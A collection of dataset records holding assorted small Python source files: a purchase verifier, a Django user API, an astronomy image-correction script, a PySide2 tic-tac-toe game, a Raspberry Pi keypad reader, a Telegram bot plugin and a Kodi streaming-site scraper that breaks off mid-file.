rsp.status_code, rsp.text)\n            return False\n\n        jdata = rsp.json()\n\n        if 'purchaseState' not in jdata:\n            logger.error('purchase invalid.bill_id: %s jdata: %s', bill_id, jdata)\n            return False\n\n        if jdata['purchaseState'] == 0 and jdata['developerPayload'] == 'DeveloperPayloadITEM%s' % bill_id:\n            logger.info('purchase valid.bill_id: %s jdata: %s', bill_id, jdata)\n            return True\n        else:\n            logger.error('purchase invalid.bill_id: %s jdata: %s', bill_id, jdata)\n            return False\n","sub_path":"ggpay/ggpay.py","file_name":"ggpay.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"430921668","text":"fraseOriginal = input(\"Enter a phrase: \")\nfraseOriginal = fraseOriginal.replace(\" \", \"\", -1)\n\nfraseReversa = \"\"\n\nfor i in range(len(fraseOriginal) - 1, -1, -1):\n    fraseReversa += fraseOriginal[i]\n\nif fraseOriginal == fraseReversa:\n    print(\"Equal\")\nelse:\n    print(\"Not equal\")","sub_path":"Python/Scripts Python/desafios/mundo02/for/desafio053.py","file_name":"desafio053.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"200887308","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2008 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt\n\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import get\n\nWorkDir=\"qmmp_skins-%s\" %get.srcVERSION()\n\ndef install():\n    for skin in (\"parskin\", \"parskin_v.2\", \"qmmp_black\", \"qmmp_black_mod1\"):\n        pisitools.insinto(\"/usr/share/qmmp/skins/%s\" % skin, \"%s/*\" % skin)\n\n    
pisitools.dodoc(\"COPYING\")\n","sub_path":"2008/stable/applications/multimedia/qmmp-skins/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"540714258","text":"from django.contrib.auth import get_user_model, authenticate\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom quickstart.serializers import LoginSerializer, NewUserSerializer\n\nNewUser = get_user_model() #引用用户模型\n\nclass LoginApiView(APIView):\n # permission_classes = (AllowAny,)\n # authentication_classes = ()\n\n def post(self, request, *args, **kwargs):\n data = request.data\n serializer = LoginSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n validated_data = serializer.validated_data\n user = authenticate(username=validated_data['username'],password=validated_data['password'])\n if user is None:\n return Response({'code':402, 'desc':'用户名或密码错误'})\n else:\n return Response({'code':200, 'desc':'登录成功'})\n\n\nclass NewUserViewSet(GenericViewSet):\n\n # permission_classes = (AllowAny,)\n queryset = NewUser.objects.all()\n serializer_class = NewUserSerializer\n\n def get_queryset(self):\n return NewUser.objects.filter(is_active=True)\n\n def list(self, request, *args, **kwargs):\n objs = self.get_queryset()\n serializer_data = NewUserSerializer(objs,many=True).data\n return Response(serializer_data)\n\n\n def create(self, request, *args, **kwargs):\n data = request.data\n serializer = NewUserSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'code':200, 'desc':'创建成功'})\n\n def update(self, request, pk, *args, **kwargs):\n obj = self.get_object()\n serializer = NewUserSerializer(obj,data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'code':200, 'desc':'修改成功'})\n\n def retrieve(self, request, *args, **kwargs):\n obj = self.get_object()\n serializer_student = NewUserSerializer(obj)\n return Response(serializer_student.data)\n\n","sub_path":"quickstart/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"390128570","text":"import numpy as np\nfrom astropy.io import fits\n# import matplotlib.pyplot as plt\nimport os\nimport time\n\ndirectory = \"gaia-606\"\noutput_dir = \"CORRECTED_gaia-606\"\n\nall_images_name_list = os.listdir(directory)\n\noffset_lst_files = [os.path.join(directory, name) for name in all_images_name_list if \"Offset\" in name]\nflat_lst_files = [os.path.join(directory, name) for name in all_images_name_list if \"Flat\" in name]\ngaia_lst_files = [os.path.join(directory, name) for name in all_images_name_list if \"Gaia\" in name]\n\n# offset\nhdu_offset = [fits.open(images) for images in offset_lst_files]\ndata_list_offset = [images[0].data for images in hdu_offset]\nmaster_offset = np.median(data_list_offset, axis=0)\n\n# flat\nhdu_flat = [fits.open(images) for images in flat_lst_files]\ndata_list_flat = [images[0].data for images in hdu_flat]\nmaster_flat = np.median(data_list_flat, axis=0)\n\n\ndef flat_field(images_index):\n global master_flat\n global master_offset\n\n im = fits.open(gaia_lst_files[images_index])\n data_im = im[0].data\n data_im_new = ((data_im - master_offset) * 
np.mean(master_flat)) / (master_flat - master_offset)\n    name = (\"image_corrected_\" + str(images_index+1).zfill(3) + \".fits\")\n    fits.writeto(os.path.join(output_dir, name), data_im_new, im[0].header)\n    print(\"image_corrected_\" + str(images_index+1).zfill(3) + \".fits\" + \" has been created\")\n    return\n\n\nif __name__ == \"__main__\":\n    start_time = time.time()\n    for i in range(len(gaia_lst_files)):\n        flat_field(i)\n    end_time = time.time()\n    print(\"Completed in: \", (end_time - start_time))\n\n# data_im_new, im = flat_field(0)\n#\n# fits.writeto(\"test.fits\", data_im_new, im[0].header)\n# fits.writeto(\"test_flat.fits\", master_flat, im[0].header)\n","sub_path":"gaia.py","file_name":"gaia.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"199835240","text":"from ..helpers import get_allowed\n\nimport os\nimport web\n\nclass ListProvidersR:\n    \"\"\"\n    This endpoint lists all of the providers that have been added.\n    \"\"\"\n    allow_origin, rest_url = get_allowed.get_allowed()\n    def GET(self):\n        \"\"\" GET HTTP Request \"\"\"\n        web.header('Access-Control-Allow-Origin', self.allow_origin)\n        try:\n            providers = {}\n            if os.path.isfile('providers.txt'):\n                with open('providers.txt', 'r') as f:\n                    for line in f:\n                        providers[line.split(\":\")[0]] = line.split(\":\")[1].strip()\n            return providers\n        except:\n            return \"unable to get providers\"\n","sub_path":"vcontrol/rest/providers/list_all.py","file_name":"list_all.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"574604211","text":"# coding=utf-8\nimport sys, random, time\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nfrom ui_mainwindow import Ui_MainWindow\n\n# Main window class\nclass MainWindow(QtWidgets.QWidget, Ui_MainWindow):\n\n    # Initialize the main window\n    def __init__(self):\n        super(MainWindow, self).__init__()\n        self.setupUi(self)\n        self.assignWidgets()\n        self.show()\n\n    # Install a click handler on each of the buttons\n    def assignWidgets(self):\n        for i in range(9):\n            temp_button = self.findChild(QtWidgets.QPushButton, str(buttons[i]))\n            temp_button.clicked.connect(self.Pushed)\n        self.NewGame.clicked.connect(self.NewGamePushed)\n\n    # Handler for the \"New game\" button\n    def NewGamePushed(self):\n        window.ScoreUser.display(0)\n        window.ScoreComp.display(0)\n        xoboard.StartNewGame()\n\n    # Handler for a click on the board. Determines which button was pressed\n    # and tries to place the user's symbol (X) there\n    def Pushed(self):\n        sending_button = self.sender()\n        sending_button_name = str(sending_button.objectName())\n        button_number = buttons.index(sending_button_name)\n        if xoboard.TryToMove(button_number, 1) != 0:\n            fight = Fight()\n            fight.Move()\n\n# Class for working with the board\nclass XOBoard:\n\n    # Initialize the array\n    def __init__(self):\n        self.StartNewGame()\n\n    # Start a new game: clears the array and the board\n    def StartNewGame(self):\n        for i in range(9):\n            Pole[i] = 0\n        self.DrawPole()\n\n    # Draw the contents of the position array on the board\n    def DrawPole(self):\n        for i in range(9):\n            temp_button = window.findChild(QtWidgets.QPushButton, str(buttons[i]))\n            if Pole[i] == 0:\n                temp_button.setText('')\n            if Pole[i] == 1:\n                temp_button.setText('X')\n            if Pole[i] == 2:\n                temp_button.setText('O')\n\n    # Check whether a winning combination is present\n    def CheckWin(self):\n        win = 0\n        showdialog = ShowDialog()\n        for i in range(8):\n            if Pole[win_comb[i][0]] == Pole[win_comb[i][1]] == Pole[win_comb[i][2]] != 0:\n                win = Pole[win_comb[i][0]]\n        if win == 1:\n            showdialog.Show('You win!')\n            score_val = window.ScoreUser.value()\n            window.ScoreUser.display(score_val + 1)\n        elif win == 2:\n            showdialog.Show('You lose!')\n            score_val = window.ScoreComp.value()\n            window.ScoreComp.display(score_val + 1)\n        if win != 0:\n            self.StartNewGame()\n        else:\n            self.CheckFullPole()\n\n    # Check for a full board with no winning combination\n    def CheckFullPole(self):\n        isFull = 1\n        for i in range(9):\n            if Pole[i] == 0:\n                isFull = 0\n        if isFull == 1:\n            SNGThread.start()\n\n    # Check whether a symbol can be placed in the given cell\n    # button_number - button index, sign - symbol code (X = 1, O = 2)\n    def TryToMove(self, button_number, sign):\n        if Pole[button_number] == 0:\n            Pole[button_number] = sign\n            self.DrawPole()\n            self.CheckWin()\n            return 1\n        else:\n            return 0\n\n# Class that starts a new game in a separate thread\n# (so that on a draw the user can see the final board state before it is reset)\nclass StartNewGameThread(QtCore.QThread):\n\n    def __init__(self):\n        QtCore.QThread.__init__(self)\n\n    def run(self):\n        # Short delay before drawing the empty board, so the last move stays visible\n        time.sleep(0.4)\n        # Clear the board value array and the board itself in the UI\n        for i in range(9):\n            Pole[i] = 0\n            window.findChild(QtWidgets.QPushButton, str(buttons[i])).setText('')\n\n# Class that computes the computer's next move\nclass Fight:\n\n    # Compute the computer's next move\n    def Move(self):\n        if self.PossibleToWin() == 0:\n            if self.IsDangerous() == 0:\n                self.BestDryMove()\n\n    # Check whether a win is possible this turn and, if so, make the winning move\n    def PossibleToWin(self):\n        return self.TestWinComb(2)\n\n    # Check whether there is a threat on the board and block it\n    def IsDangerous(self):\n        return self.TestWinComb(1)\n\n    # Make a neutral move when no win is possible this turn and there are no threats\n    def BestDryMove(self):\n        # Define arrays of preferred moves\n        # (the center and corner cells take priority over the edge centers)\n        BestMoves1 = [0, 2, 6, 8, 4]\n        BestMoves2 = [1, 3, 5, 7]\n        # shuffle the arrays to add some variety\n        random.shuffle(BestMoves1)\n        random.shuffle(BestMoves2)\n        # \"Move made\" flag\n        Moved = 0\n        # Concatenate all moves into one array in order of preference\n        BestMoves = []\n        BestMoves.extend(BestMoves1)\n        BestMoves.extend(BestMoves2)\n        # Look for the first promising move from the priority list\n        for i in range(9):\n            if Moved == 0:\n                if Pole[BestMoves[i]] == 0:\n                    for i1 in range(8):\n                        temp_arr = list(win_comb[i1])\n                        LineLen = 0\n                        if BestMoves[i] in temp_arr:\n                            for i2 in range(3):\n                                if Pole[temp_arr[i2]] != 1:\n                                    LineLen = LineLen +1\n                            if LineLen == 3 and Moved == 0:\n                                Moved = xoboard.TryToMove(BestMoves[i], 2)\n        # If no promising move was found, move to the first free\n        # cell from the priority list\n        if Moved == 0:\n            for i in range(9):\n                if Moved == 0:\n                    Moved = xoboard.TryToMove(BestMoves[i], 2)\n\n    # Check combinations that are one move away from winning (sign - symbol code: X=1, O=2)\n    def TestWinComb(self, sign):\n        # \"Move made\" flag\n        Moved = 0\n        # iterate over the pre-winning combinations\n        for i1 in range(24):\n            # there is a match and we have not moved yet\n            if Pole[danger_comb[i1][0]] == Pole[danger_comb[i1][1]] == sign and Moved == 0:\n                for i2 in range(8):\n                    # pick a winning combination into temp_arr\n                    temp_arr = list(win_comb[i2])\n                    # remove the pre-winning combination's cells from temp_arr\n                    if danger_comb[i1][0] in temp_arr:\n                        temp_arr.remove(danger_comb[i1][0])\n                    if danger_comb[i1][1] in temp_arr:\n                        temp_arr.remove(danger_comb[i1][1])\n                    # if one element is left, it is empty and no move has been made yet - move there\n                    if len(temp_arr) == 1 and Moved == 0 and Pole[temp_arr[0]] == 0:\n                        Moved = xoboard.TryToMove(temp_arr[0], 2)\n        return Moved\n\n# Class for showing a dialog box\nclass ShowDialog:\n\n    # Show a dialog box (text - the string to display)\n    def Show(self, text):\n        msgBox = QtWidgets.QMessageBox()\n        msgBox.setText(text)\n        msgBox.exec_()\n\nif __name__ == '__main__':\n\n    import sys\n    # List of the board button names\n    buttons = ['Field1', 'Field2', 'Field3', 'Field4', 'Field5', 'Field6', 'Field7', 'Field8', 'Field9']\n    # List of winning combinations\n    win_comb = [[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 3, 6], [1, 4, 7], [2, 5, 8], [0, 4, 8], [2, 4, 6]]\n    # Generate the array of pre-winning combinations from the winning ones\n    danger_comb = []\n    for i in range(8):\n        for i1 in range(3):\n            temp_comb = list(win_comb[i])\n            del temp_comb[i1]\n            danger_comb.append(temp_comb)\n    # Main array holding the board state\n    Pole = {}\n    SNGThread = StartNewGameThread()\n    app = QtWidgets.QApplication(sys.argv)\n    window = MainWindow()\n    window.show()\n    xoboard = XOBoard()\n    xoboard.__init__()\n    sys.exit(app.exec_())\n","sub_path":"xo.py","file_name":"xo.py","file_ext":"py","file_size_in_byte":10058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"265852826","text":"import tensorflow as tf\nfrom memory import Memory\nfrom model import Model\nfrom trainer import Trainer\nimport params\nimport json\n\n\n\nwith tf.Session() as sess:\n\n    model = Model(params.BOARD_WIDTH, params.BOARD_HEIGHT)\n\n    new_saver = tf.train.import_meta_graph('./models/model.meta')\n    new_saver.restore(sess, tf.train.latest_checkpoint('./models/'))\n\n    # Create the memory\n    memory = Memory(params.MEMORY_SIZE)\n\n    # Initialize the model parameters\n    sess.run(model.var_init)\n\n    # Initialize the trainer\n    trainer = Trainer(sess, model, memory)\n\n    for episode in range(params.NUM_EPISODES):\n        print(\"Episode: {}\".format(episode))\n        gm = trainer.gen_game(episode)\n\n        gm.play(trainer)\n\n        print(\"Number of Turns: {}\".format(gm.turn))\n\n        # Save model every 5 episodes\n        if episode % 5 == 0:\n            save_path = new_saver.save(sess, \"./models/model\")\n            print(\"Model Saved\")\n\n        # Save game every 100 
episodes\n if episode % 100 == 0:\n with open(\"../../resources/replays/{}.txt\".format(episode), \"w\") as f:\n f.write(json.dumps(gm.logger.output()))\n print (\"Saved Replay\")","sub_path":"src/training/play_latest.py","file_name":"play_latest.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597878710","text":"import RPi.GPIO as GPIO\nimport Keypad #import module Keypad\nROWS = 4 # number of rows of the Keypad\nCOLS = 4 #number of columns of the Keypad\nkeys = [ '1','2','3','A', #key code\n '4','5','6','B',\n '7','8','9','C',\n '*','0','#','D' ]\nrowsPins = [29,31,33,35] #connect to the row pinouts of the keypad\ncolsPins = [40,38,36,32] #connect to the column pinouts of the keypad\n\ndef loop():\n keypad = Keypad.Keypad(keys,rowsPins,colsPins,ROWS,COLS) #create Keypad object\n keypad.setDebounceTime(50) #set the debounce time\n while(True):\n key = keypad.getKey() #obtain the state of keys\n if(key != keypad.NULL): #if there is key pressed, print its key code.\n print (\"You Pressed Key : %c \"%(key))\n \nif __name__ == '__main__': #Program start from here\n print (\"Program is starting ... \")\n try:\n loop()\n except KeyboardInterrupt: #When 'Ctrl+C' is pressed, exit the program. \n GPIO.cleanup()","sub_path":"praktek-3/module_keypad/keypad_board.py","file_name":"keypad_board.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101107447","text":"\"\"\"Check if userbot alive or not . \"\"\"\n\nimport time\nfrom userbot import StartTime, pepe, get_readable_time\nfrom uniborg.util import admin_cmd\nfrom telethon import version\nfrom platform import python_version\nfrom uniborg import MODULE\nMODULE.append(\"alive\")\n\n\n@borg.on(admin_cmd(pattern=\"alive\", allow_sudo=True))\nasync def amireallyalive(alive):\n reply_to_id = alive.message\n uptime = await get_readable_time((time.time() - StartTime))\n if alive.reply_to_msg_id:\n reply_to_id = await alive.get_reply_message()\n output = f\"\"\"\n**✮PEPEBOT is Up and Running BSDK✮**\n\n 😴 __Lazy as a Sloth__ 😴\n\n✧ **System** : `Linux`\n✧ **Uptime** : `{uptime}`\n✧ **Telethon version** : `{version.__version__}`\n✧ **Python Version** : `{python_version()}`\n✧ **PepeBot Version** : `{pepe}`\n✧ **Database** : `Functioning Normally`\n✧ **My Master** : [NIKITA](https://t.me/kirito6969)\n\n**Pepe is always with you, my master!**\n\n✧ **Repo** : [PEPEBOT](https://github.com/prono69/PepeBot)\"\"\"\n\n sticker = (await borg.get_messages('LazyAF_Pepe', 25))\n await borg.send_file(alive.chat_id, file=sticker)\n await borg.send_message(alive.chat_id, output, reply_to=reply_to_id, link_preview=False)\n await alive.delete()\n","sub_path":"stdplugins/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"137717194","text":"#-*- coding: utf-8 -*-\n# https://github.com/Kodi-vStream/venom-xbmc-addons\nfrom resources.lib.gui.hoster import cHosterGui\nfrom resources.lib.gui.gui import cGui\nfrom resources.lib.handler.inputParameterHandler import cInputParameterHandler\nfrom resources.lib.handler.outputParameterHandler import cOutputParameterHandler\nfrom resources.lib.handler.requestHandler import cRequestHandler\nfrom resources.lib.parser import cParser\nfrom resources.lib.util import cUtil\nfrom resources.lib.comaddon import 
progress\n\nSITE_IDENTIFIER = 'libre_stream_org'\nSITE_NAME = 'Libre-Streaming'\nSITE_DESC = 'Films & Séries en streaming'\n\nURL_MAIN = 'http://ls-streaming.com/'\n\nMOVIE_MOVIE = (URL_MAIN + 'films/', 'showMovies')\nMOVIE_NEWS = (URL_MAIN + 'films/', 'showMovies')\nMOVIE_GENRES = (True, 'showGenres')\nMOVIE_QLT = (True, 'showQlt')\n\nSERIE_SERIES = (URL_MAIN + 'series/', 'showMovies')\nSERIE_NEWS = (URL_MAIN + 'series/', 'showMovies')\n#SERIE_LIST = (URL_MAIN + 'liste-des-series/', 'AlphaSearch')\nSERIE_VFS = (URL_MAIN + 'series/version-francaise/', 'showMovies')\nSERIE_VOSTFRS = (URL_MAIN + 'series/vostfr/', 'showMovies')\n\nURL_SEARCH = (URL_MAIN + '?q=', 'showMovies')\nURL_SEARCH_MOVIES = (URL_MAIN + '?q=', 'showMovies')\nURL_SEARCH_SERIES = (URL_MAIN + '?q=', 'showMovies')\nFUNCTION_SEARCH = 'showMovies'\n\ndef load():\n oGui = cGui()\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', 'http://venom/')\n oGui.addDir(SITE_IDENTIFIER, 'showSearch', 'Recherche', 'search.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', MOVIE_NEWS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Films (Derniers ajouts)', 'news.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', MOVIE_GENRES[0])\n oGui.addDir(SITE_IDENTIFIER, MOVIE_GENRES[1], 'Films (Genres)', 'genres.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', MOVIE_QLT[0])\n oGui.addDir(SITE_IDENTIFIER, MOVIE_QLT[1], 'Films (Qualités)', 'films.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', SERIE_NEWS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Séries (Derniers ajouts)', 'news.png', oOutputParameterHandler)\n\n #En panne au 14/06\n #oOutputParameterHandler = cOutputParameterHandler()\n #oOutputParameterHandler.addParameter('siteUrl', SERIE_LIST[0])\n #oGui.addDir(SITE_IDENTIFIER, SERIE_LIST[1], 'Séries (Liste)', 'az.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', SERIE_VFS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Séries (VF)', 'vf.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', SERIE_VOSTFRS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Séries (VOSTFR)', 'vostfr.png', oOutputParameterHandler)\n\n oGui.setEndOfDirectory()\n\ndef showSearch():\n oGui = cGui()\n\n sSearchText = oGui.showKeyBoard()\n if (sSearchText != False):\n sUrl = URL_SEARCH[0] + sSearchText\n showMovies(sUrl)\n oGui.setEndOfDirectory()\n return\n\ndef showGenres():\n oGui = cGui()\n\n liste = []\n liste.append( ['Action', URL_MAIN + 'films/action/'] )\n liste.append( ['Animation', URL_MAIN + 'films/animation/'] )\n liste.append( ['Arts Martiaux', URL_MAIN + 'films/arts-martiaux/'] )\n liste.append( ['Aventure', URL_MAIN + 'films/aventure/'] )\n liste.append( ['Biopic', URL_MAIN + 'films/biopic/'] )\n liste.append( ['Comédie', URL_MAIN + 'films/comedie/'] )\n liste.append( ['Comédie Dramatique', URL_MAIN + 'films/comedie-dramatique/'] )\n liste.append( ['Comédie Musicale', URL_MAIN + 'films/comedie-musicale/'] )\n liste.append( ['Disney', URL_MAIN + 'films/disney/'] )\n liste.append( 
['Divers', URL_MAIN + 'films/divers/'] )\n liste.append( ['Documentaire', URL_MAIN + 'films/documentaire/'] )\n liste.append( ['Drame', URL_MAIN + 'films/drame/'] )\n liste.append( ['Epouvante Horreur', URL_MAIN + 'films/horreur/'] )\n liste.append( ['Espionnage', URL_MAIN + 'films/espionnage/'] )\n liste.append( ['Famille', URL_MAIN + 'films/famille/'] )\n liste.append( ['Fantastique', URL_MAIN + 'films/fantastique/'] )\n liste.append( ['Guerre', URL_MAIN + 'films/guerre/'] )\n liste.append( ['Historiques', URL_MAIN + 'films/historique/'] )\n liste.append( ['Horreur', URL_MAIN + 'films/horreur/'] )\n liste.append( ['Musicale', URL_MAIN + 'films/musical/'] )\n liste.append( ['Policier', URL_MAIN + 'films/policier/'] )\n liste.append( ['Romance', URL_MAIN + 'films/romance/'] )\n liste.append( ['Science Fiction', URL_MAIN + 'films/science-fiction/'] )\n liste.append( ['Spectacles', URL_MAIN + 'films/spectacles/'] )\n liste.append( ['Thriller', URL_MAIN + 'films/triller/'] )\n liste.append( ['Western', URL_MAIN + 'films/western/'] )\n\n for sTitle, sUrl in liste:\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl)\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', sTitle, 'genres.png', oOutputParameterHandler)\n\n oGui.setEndOfDirectory()\n\ndef showQlt():\n oGui = cGui()\n\n liste = []\n liste.append( ['HD', URL_MAIN + 'films-hd/'] )\n liste.append( ['DvdRip', URL_MAIN + 'quality/dvdrip/'] )\n liste.append( ['BdRip', URL_MAIN + 'quality/bdrip/'] )\n liste.append( ['R5', URL_MAIN + 'quality/R5/'] )\n liste.append( ['Cam Rip', URL_MAIN + 'quality/camrip/'] )\n liste.append( ['TS', URL_MAIN + 'quality/ts/'] )\n\n for sTitle, sUrl in liste:\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl)\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', sTitle, 'films.png', oOutputParameterHandler)\n\n oGui.setEndOfDirectory()\n\ndef AlphaSearch():\n oGui = cGui()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n\n progress_ = progress().VScreate(SITE_NAME)\n\n for i in range(0, 36) :\n progress_.VSupdate(progress_, 36)\n if progress_.iscanceled():\n break\n\n if (i < 10):\n sTitle = chr(48 + i)\n else:\n sTitle = chr(65 + i -10)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl + sTitle.lower() + '.html')\n oOutputParameterHandler.addParameter('sMovieTitle', sTitle)\n oGui.addDir(SITE_IDENTIFIER, 'AlphaDisplay', '[COLOR teal] Lettre [COLOR red]' + sTitle + '[/COLOR][/COLOR]', 'listes.png', oOutputParameterHandler)\n\n progress_.VSclose(progress_)\n\n oGui.setEndOfDirectory()\n\ndef AlphaDisplay():\n oGui = cGui()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n\n oParser = cParser()\n sPattern = '\"]+?)\">([^<>\"]+?)<\\/a>
    '\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == True):\n total = len(aResult[1])\n progress_ = progress().VScreate(SITE_NAME)\n for aEntry in aResult[1]:\n progress_.VSupdate(progress_, total)\n if progress_.iscanceled():\n break\n\n sUrl = aEntry[0]\n sTitle = aEntry[1]\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl)\n oOutputParameterHandler.addParameter('sMovieTitle', sTitle)\n oGui.addDir(SITE_IDENTIFIER, 'seriesHosters', sTitle, 'az.png', oOutputParameterHandler)\n\n progress_.VSclose(progress_)\n\n oGui.setEndOfDirectory()\n\ndef showMovies(sSearch = ''):\n oGui = cGui()\n oParser = cParser()\n if sSearch:\n sUrl = sSearch.replace(' ', '+')\n else:\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n\n sPattern = '
    .+?class=\"maskhr\">Synopsis.+?(.+?)
    '\n if '/films' in sUrl:\n sPattern = sPattern + '.+?
    '\n if '/series' in sUrl:\n sPattern = sPattern + '.+?>Séries.+?(.+?)'\n\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == False):\n oGui.addText(SITE_IDENTIFIER)\n\n if (aResult[0] == True):\n total = len(aResult[1])\n progress_ = progress().VScreate(SITE_NAME)\n for aEntry in aResult[1]:\n progress_.VSupdate(progress_, total)\n if progress_.iscanceled():\n break\n\n #Si recherche et trop de resultat, on nettoye\n if sSearch and total > 2:\n if cUtil().CheckOccurence(sSearch.replace(URL_SEARCH[0], ''), aEntry[1]) == 0:\n continue\n\n sTitle = aEntry[1].replace(' - Saison', ' Saison')\n sUrl2 = aEntry[2]\n sDesc = aEntry[3]\n sThumb = aEntry[0]\n if sThumb.startswith('/'):\n sThumb = URL_MAIN[:-1] + sThumb\n\n if not '/series/' in sUrl and not '/films/' in sUrl:\n sDisplayTitle = sTitle\n\n if '/films/' in sUrl:\n sQual = aEntry[4]\n #on supprime [VOSTFR], [HD 720p] et DVDRIP du titre car affiche en tant que qualite sinon doublons\n sMovieTitle = sTitle.replace('[VOSTFR]', '').replace('[HD 720p]', '').replace('DVDRIP ', '')\n sDisplayTitle = sMovieTitle + ' [' + sQual + ']'\n\n if '/series/' in sUrl:\n if not '/vostfr/' in sUrl and not '/version-francaise/' in sUrl:\n sLang = aEntry[4]\n sLang = sLang.replace('Version Française', 'VF')\n sDisplayTitle = sTitle + ' (' + sLang + ')'\n else:\n sDisplayTitle = sTitle\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl2)\n oOutputParameterHandler.addParameter('sMovieTitle', sTitle)\n oOutputParameterHandler.addParameter('sThumb', sThumb)\n\n if '/series/' in sUrl or '-saison-' in sUrl2:\n oGui.addTV(SITE_IDENTIFIER, 'seriesHosters', sDisplayTitle, '', sThumb, sDesc, oOutputParameterHandler)\n else:\n oGui.addMovie(SITE_IDENTIFIER, 'showHosters', sDisplayTitle, '', sThumb, sDesc, oOutputParameterHandler)\n\n progress_.VSclose(progress_)\n\n sNextPage = __checkForNextPage(sHtmlContent)\n if (sNextPage != False):\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sNextPage)\n oGui.addNext(SITE_IDENTIFIER, 'showMovies', '[COLOR teal]Next >>>[/COLOR]', oOutputParameterHandler)\n\n if not sSearch:\n oGui.setEndOfDirectory()\n\ndef __checkForNextPage(sHtmlContent):\n sPattern = '\"\"]+?)\">'\n oParser = cParser()\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == True):\n return aResult[1][0]\n\n return False\n\ndef showHosters():\n oGui = cGui()\n oParser = cParser()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')\n sThumb = oInputParameterHandler.getValue('sThumb')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n sHtmlContent = sHtmlContent.replace('http://creative.rev2pub.com', '')\n\n sPattern = '\\'\"]+?)[\\'\"]'\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == True):\n for aEntry in aResult[1]:\n\n if '/player' in aEntry:\n sTitle = sMovieTitle + ' (Redirection)'\n sUrl1 = aEntry.replace('player.full-stream.co/player?id=', 'full-stream.co/player.php?id=')\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl1)\n oOutputParameterHandler.addParameter('sMovieTitle', 